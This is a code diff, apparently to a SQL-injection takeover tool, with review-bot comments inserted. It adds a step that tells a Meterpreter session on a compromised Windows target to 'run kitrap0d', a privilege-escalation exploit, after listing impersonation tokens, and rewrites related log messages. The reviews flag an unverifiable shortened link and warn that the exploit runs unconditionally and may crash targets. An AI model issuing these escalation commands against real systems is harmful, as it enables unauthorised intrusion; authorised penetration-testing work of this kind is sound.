diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
index 0436a1ebe..9bd178e71 100644
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -187,9 +187,10 @@ class Metasploit:
     def __selectPayload(self, askChurrasco=True):
         if kb.os == "Windows" and conf.privEsc:
             infoMsg = "forcing Metasploit payload to Meterpreter because "
-            infoMsg += "it is the only payload that can abuse Windows "
-            infoMsg += "Access Tokens via Meterpreter 'incognito' "
-            infoMsg += "extension to privilege escalate"
+            infoMsg += "it is the only payload that can be used to "
+            infoMsg += "escalate privileges, either via 'incognito' "
+            infoMsg += "extension or via 'kitrap0d' script, "
+            infoMsg += "http://tinyurl.com/kitrap0d for details"
             logger.info(infoMsg)
 
             __payloadStr = "windows/meterpreter"
@@ -458,6 +459,12 @@ class Metasploit:
 
             proc.stdin.write("list_tokens -u\n")
 
+            infoMsg = "trying also to escalate privileges using "
+            infoMsg += "kitrap0d script"
+            logger.info(infoMsg)
+
+            proc.stdin.write("run kitrap0d\n")
+
     def __controlMsfCmd(self, proc, func):
         stdin_fd = sys.stdin.fileno()
         setNonBlocking(stdin_fd)
diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py
index 36f7c17bf..e3232daf5 100644
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
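Review bot: The reworded message in `__selectPayload` sends the operator to `http://tinyurl.com/kitrap0d`, a plain-HTTP link shortener whose redirect target can be changed or expire outside the project's control, so the only pointer the tool gives for what is about to be run on the target is unverifiable. I'd replace the shortener with the canonical reference (the Metasploit script source or the advisory it implements) and keep it out of the per-run log line, e.g. `infoMsg += "extension or via 'kitrap0d' script"` with the full reference in a comment above the message. The message also no longer says what 'kitrap0d' does; a short comment above the `if`, such as `# kitrap0d is a Meterpreter script tried in addition to incognito token impersonation; see <canonical reference> before enabling on production targets`, would help the next reader and the operator alike. The rest of `__selectPayload` continues outside this hunk.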
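Review bot: The added `proc.stdin.write("run kitrap0d\n")` is issued unconditionally straight after `list_tokens -u`, without waiting for or checking the incognito result, so the script is launched on every target even when token impersonation has already produced the wanted privileges. If kitrap0d is the kernel-level exploit its name suggests, a failed attempt can crash the target, which is a destructive side effect an operator should opt into rather than receive by default. I'd gate it behind an explicit prompt or a dedicated option, log the decision, and only fall back to it when the incognito path did not succeed, e.g. `if <operator confirmed kernel exploit>: proc.stdin.write("run kitrap0d\n")`, with a comment stating the crash risk next to it. The enclosing method starts before this hunk, so I cannot see whether such gating already exists above.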
@@ -165,15 +165,16 @@ class Takeover(Abstraction, Metasploit, Registry):
                 warnMsg = "by default PostgreSQL on Windows runs as postgres "
                 warnMsg += "user which has no Windows Impersonation "
                 warnMsg += "Tokens: it is unlikely that the privilege "
-                warnMsg += "escalation will be successful"
+                warnMsg += "escalation via 'incognito' extension will "
+                warnMsg += "be successful"
                 logger.warn(warnMsg)
 
             elif kb.dbms == "Microsoft SQL Server" and kb.dbmsVersion[0] in ( "2005", "2008" ):
                 warnMsg = "often Microsoft SQL Server %s " % kb.dbmsVersion[0]
                 warnMsg += "runs as Network Service which has no Windows "
                 warnMsg += "Impersonation Tokens within all threads, this "
-                warnMsg += "makes Meterpreter's incognito extension to "
-                warnMsg += "fail to list tokens"
+                warnMsg += "makes Meterpreter's 'incognito' extension "
+                warnMsg += "to fail to list tokens"
                 logger.warn(warnMsg)
 
             uploaded = self.uploadChurrasco()